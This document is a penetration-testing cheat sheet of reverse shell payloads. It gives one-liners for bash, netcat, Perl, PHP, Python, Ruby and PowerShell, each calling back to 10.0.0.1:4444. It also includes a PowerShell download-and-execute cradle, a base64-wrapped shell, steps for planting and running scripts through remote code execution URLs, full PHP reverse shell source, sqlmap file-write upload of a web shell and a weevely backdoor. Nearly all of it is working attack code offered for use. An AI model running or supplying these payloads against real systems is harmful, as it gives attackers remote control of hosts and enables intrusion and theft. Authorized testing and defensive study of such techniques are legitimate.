Reverse Shell Cheat Sheet
Last modified: 2023-03-10
Preparation
First of all, we need to start listener in local machine to get an incoming connection.
nc -lvnp 4444
Cheat Sheets
Bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
# For URL param
bash+-i+>%26+/dev/tcp/10.0.0.1/4444+0>%261
Netcat OpenBSD
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
Ncat
ncat 10.0.0.1 4444 -e /bin/bash
ncat 10.0.0.1 4444 -e /bin/sh
ncat 10.0.0.1 4444 -c bash
ncat --udp 10.0.0.1 4444 -e /bin/bash
nc 10.0.0.1 4444 -e /bin/bash
nc 10.0.0.1 4444 -e /bin/sh
nc 10.0.0.1 4444 -c bash
nc --udp 10.0.0.1 4444 -e /bin/bash
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
-
Script File
If we pass the script to php binary, create a PHP script as follow.
// shell.php use Socket; $i="10.0.0.1"; $p=4444; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); };
Then run php.
php ./shell.php
PHP
php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Python
python -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Nishang
Nishang is the Offensive PowerShell for red team, penetration testing and offensive security.
-
Preparing the Payload in Your Local Machine
First off, copy the payload to the current working directory.
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 . mv Invoke-PowerShellTcp.ps1 shell.ps1
Add the following code to the final line in the payload (shell.ps1).
Invoke-PowerShellTcp -Reverse -IPAddress <your-local-ip> -Port 4444
-
Opening Wev Server in Your Local Machine
To download the payload and execute the reverse shell in the target machine, open the web server in your local machine.
python3 -m http.server 8000
-
Downloading the Payload and Executing Reverse Shell
In the target machine, download the local-hosted payload and run reverse shell.
cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://<your-local-ip>:8000/shell.ps1')
Reverse Shell with Base64
First create the base64 which executes reverse shell.
echo -n 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' | base64
Then copy the base64 text and paste into the payload.
echo -n "<Base64>" | base64 -d | bash
Reverse Shell over Websites
Shell Script & Remote Code Execution (RCE)
If we can find a website is vulnerable to Remote Code Execution but cannot Reverse Shell, we may be able to do that by uploading the script.
-
Create a shell script to reverse shell.
This file is named "revshell.sh".
#!/bin/bash bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1
-
Upload the script to website
Start web server in local machine to upload the script.
python3 -m http.server 8000
Then upload it by remote code execution in target website.
https://vulnerable.com/?cmd=wget http://<local-ip>:8000/revshell.sh # or https://vulnerable.com/?cmd=curl <local-ip>:8000/revshell.sh
To confirm the script uploaded, execute the following RCE.
https://vulnerable.com/?cmd=ls
-
Get a shell
Start listener for getting a shell in local machine.
nc -lvnp 4444
Now execute the uploaded script via RCE.
# 1. Change permission for the script https://vulenrable.com/?cmd=chmod 777 revshell.sh # 2. Execute the script https://vulnerable.com/?cmd=./revshell.sh
We should now get the target shell.
PHP Reverse Shell
php-reverse-shell is an awesome payload against a website using PHP.
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
# Edit $ip and $port to your local ip:port in the payload
Update `$ip` and `$port` in the payload to your local ip and port.
Then upload the payload, or copy the content and paste to somewhere in the target website directly, and reload the page.
PHP Reverse Shell (without fsockopen, and for FreeBSD)
<?php
set_time_limit (0);
$ip = '10.0.0.1'; // CHANGE THIS
$port = 4444; // CHANGE THIS
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("file", "/tmp/error-output.txt", "a") // stderr is a pipe that the child will write to
);
$cwd = "/tmp";
$env = array('some_option' => 'aeiou');
$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f');
fclose($pipes[0]);
echo stream_get_contents($pipes[1]);
fclose($pipes[1]);
$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>
PHP Reverse Shell for Windows
We can get the payload in here.
Upload the Payload using SQLi
# req.txt: The request settings file which is saved using Burp Suite
sqlmap -r req.txt --dbs --random-agent --batch --file-dest=/var/www/html/shell.php --file-write=./shell.php
Useful Tools
-
A web shell generator.
-
Generate Backdoor with Password
Credentials required.
weevely generate <password> ./shell.php
-
Upload the Payload to Target Website and Execute Commands
weevely https://vulnerable.com/upload/shell.php <password> whoami
-
Get a Shell
weevely https://vulnerable.com/upload/shell.php <password>
-
Pwncat
Pwncat is a reverse and bind shell handler.
For listening from remote connection, run the following command.
pwncat-cs -lp 4444
Commands in Pwncat Shell
After reverse connecting, we can execute commands either local or remote.
# Switch between Local and Remote shell
Ctrl+D
# Upload a file to target machine (e.g. upload example.txt from local to remote)
(local) upload ./example.txt /tmp/example.txt
Upgrade to a Full Functional Shell
After connecting to the target shell with reverse shell, it's recommended to make the shell to be more elegant.
SHELL=/bin/bash script -q /dev/null
# or
python3 -c 'import pty; pty.spawn("/bin/bash")'
The commands below make our shell even more perfect.
Ctrl+z
stty raw -echo;fg
Enter x2
export TERM=xterm